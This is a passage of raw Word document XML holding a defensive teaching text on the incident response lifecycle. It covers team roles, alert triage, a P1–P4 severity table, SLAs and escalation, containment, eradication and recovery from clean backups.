          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident response plan and policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — roles, authority, definitions, how to report an incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IR team (CSIRT/SOC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with defined roles: incident manager, analysts, forensic investigator, communications, legal, HR, management sponsor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Playbooks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for common incident types (ransomware, phishing, insider threat).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SIEM (e.g. Splunk), EDR, forensic workstation, write blockers, clean media, jump bag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Visibility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — logging, time synchronisation, backups tested for restoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Training and drills</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — table-top exercises; contact lists for internal staff, vendors, CERT-In, law enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 — Detection and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifies events that may be incidents. Sources include SIEM alerts, antivirus/EDR, IDS, firewall and proxy logs, threat intelligence, and reports from users. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> then decides whether the event is really an incident, how big it is and what it affects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Triage of an alert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rPr>
          <w:cantSplit/>
        </w:trPr>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Alert received</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Validate (real or false positive?)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Scope (systems, accounts, data)</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Classify severity</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Escalate / respond</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Validating a failed-login alert</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A SIEM alert reports repeated failed logins. The analyst checks: source IP (internal or external?), account targeted, time pattern, number of attempts, and whether a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">successful login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> followed. The result could be </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">benign</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (user forgot password), a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">false positive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suspicious activity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, or a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">confirmed incident</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Only confirmed incidents move on to containment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident classification and severity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170"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="4873"/>
        <w:gridCol w:w="2144"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>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 (examples)</w:t>
            </w:r>
          </w:p>
        </w:tc>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Typical response time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1170"/>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P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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Critical</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Active breach, ransomware spreading, major data loss, business-critical services down</w:t>
            </w:r>
          </w:p>
        </w:tc>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Immediate; incident team and management at once</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1170"/>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P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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High</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Significant compromise of important system or account; contained but serious</w:t>
            </w:r>
          </w:p>
        </w:tc>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Within hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1170"/>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P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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Medium</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Limited impact, e.g. single workstation infection</w:t>
            </w:r>
          </w:p>
        </w:tc>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Within one business day</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1170"/>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P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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Low</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Minor event or policy violation</w:t>
            </w:r>
          </w:p>
        </w:tc>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Scheduled handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact criteria and timings are defined by the organisation’s policy. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact assessment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> looks at: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">confidentiality</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (was sensitive data exposed?), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">integrity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (was data or a system modified?), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">availability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (are services down?), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">business impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (money, operations, reputation) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">legal/regulatory impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (duty to report, e.g. to CERT-In or under data protection law).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SLA and escalation</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Service Level Agreement (SLA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sets the expected response and resolution times by severity (for example, P1: respond in 15 minutes). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means passing the incident to people with more skill or authority when needed — technical team (investigation, containment), management (business decisions), legal (obligations, evidence), HR (employee cases), and external authorities where required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 — Containment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> limits the spread and damage so that the attacker cannot do more harm, while still allowing investigation.</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Actions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Short-term containment</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Isolate the affected host from the network (but keep it powered on if volatile evidence is needed), block malicious IPs/domains, disable compromised accounts, stop affected services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Long-term containment</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Apply temporary fixes so that systems can run safely while a full fix is prepared: network segmentation, extra monitoring, rebuilding clean systems in parallel</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Evidence vs speed</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Before wiping, re-imaging or rebooting an affected system, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">collect volatile data and a disk image</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (see 5.4). A common rule: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">isolate, don’t power off; image, then rebuild.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 — Eradication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Eradication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> removes the root cause and every trace of the attacker: delete malware, remove persistence (registry run keys, scheduled tasks, cron jobs, rogue accounts and keys), patch the exploited vulnerability, reset all possibly exposed passwords and keys, and fix misconfigurations. Forensic findings tell the team </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">what to remove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — otherwise the attacker returns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 5 — Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> restores systems to normal, trusted operation. Restore from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">clean, verified backups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not backups made after the infection), rebuild systems where needed, test functionality, return systems to production step by step, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor closely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for signs the attacker is back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
